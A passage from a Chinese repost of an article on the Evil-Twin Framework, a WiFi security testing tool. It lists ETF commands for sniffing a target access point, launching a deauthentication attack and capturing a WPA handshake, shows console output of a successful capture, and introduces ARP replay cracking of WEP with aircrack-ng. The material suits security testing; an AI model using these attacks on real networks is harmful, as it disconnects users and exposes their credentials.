设为首页 - 加入收藏 ASP站长网(Aspzz.Cn)- 科技、建站、经验、云计算、5G、大数据,站长网!
热搜: 数据 手机 公司
当前位置: 首页 > 服务器 > 搭建环境 > Windows > 正文

Evil-Twin框架:一个用于提升WiFi安全性的工具(2)

发布时间:2019-02-25 13:18 所属栏目:117 来源:André Esser
导读:ETF 启用了 AirScanner 模块并分析 IEEE 802.11 数据帧来发现 WPA 握手包。然后 AirInjecto 就可以使用解除认证攻击来强制客户端断开连接,以进行重连。必须在 ETF 上执行下面这些步骤才能完成上面的目标: 进入 Ai

ETF 启用了 AirScanner 模块并分析 IEEE 802.11 数据帧来发现 WPA 握手包。然后 AirInjecto 就可以使用解除认证攻击来强制客户端断开连接,以进行重连。必须在 ETF 上执行下面这些步骤才能完成上面的目标:

  1. 进入 AirScanner 配置模式:config airscanner
  2. 设置 AirScanner 不跳信道:config airscanner
  3. 设置信道以嗅探经过 WiFi 接入点信道的数据(APC):set fixed_sniffing_channel = <APC>
  4. 使用 CredentialSniffer 插件来启动 AirScanner 模块:start airscanner with credentialsniffer
  5. 从已嗅探的接入点列表中添加目标接入点的 BSSID(APS):add aps where ssid = <APS>
  6. 启用 AirInjector 模块,在默认情况下,它会启用解除认证攻击:start airinjector

这些简单的命令设置能让 ETF 在每次测试时执行成功且有效的解除认证攻击。ETF 也能在每次测试的时候捕获 WPA 的握手数据包。下面的代码能让我们看到 ETF 成功的执行情况。

  1. ███████╗████████╗███████╗
  2. ██╔════╝╚══██╔══╝██╔════╝
  3. █████╗     ██║   █████╗  
  4. ██╔══╝     ██║   ██╔══╝  
  5. ███████╗   ██║   ██║    
  6. ╚══════╝   ╚═╝   ╚═╝    
  7.                                        
  8.  
  9. [+] Do you want to load an older session? [Y/n]: n
  10. [+] Creating new temporary session on 02/08/2018
  11. [+] Enter the desired session name:
  12. ETF[etf/aircommunicator/]::> config airscanner
  13. ETF[etf/aircommunicator/airscanner]::> listargs
  14.   sniffing_interface =               wlan1; (var)
  15.               probes =                True; (var)
  16.              beacons =                True; (var)
  17.         hop_channels =               false; (var)
  18. fixed_sniffing_channel =                  11; (var)
  19. ETF[etf/aircommunicator/airscanner]::> start airscanner with
  20. arpreplayer        caffelatte         credentialsniffer  packetlogger       selfishwifi        
  21. ETF[etf/aircommunicator/airscanner]::> start airscanner with credentialsniffer
  22. [+] Successfully added credentialsniffer plugin.
  23. [+] Starting packet sniffer on interface 'wlan1'
  24. [+] Set fixed channel to 11
  25. ETF[etf/aircommunicator/airscanner]::> add aps where ssid = CrackWPA
  26. ETF[etf/aircommunicator/airscanner]::> start airinjector
  27. ETF[etf/aircommunicator/airscanner]::> [+] Starting deauthentication attack
  28.                     - 1000 bursts of 1 packets
  29.                     - 1 different packets
  30. [+] Injection attacks finished executing.
  31. [+] Starting post injection methods
  32. [+] Post injection methods finished
  33. [+] WPA Handshake found for client '70:3e:ac:bb:78:64' and network 'CrackWPA'

使用 ARP 重放攻击并破解 WEP 无线网络

下面这个场景(图 3)将关注地址解析协议(ARP)重放攻击的效率和捕获包含初始化向量(IVs)的 WEP 数据包的速度。相同的网络可能需要破解不同数量的捕获的 IVs,所以这个场景的 IVs 上限是 50000。如果这个网络在首次测试期间,还未捕获到 50000 IVs 就崩溃了,那么实际捕获到的 IVs 数量会成为这个网络在接下来的测试里的新的上限。我们使用 aircrack-ng 对数据包进行破解。

(编辑:ASP站长网)

网友评论
推荐文章
    热点阅读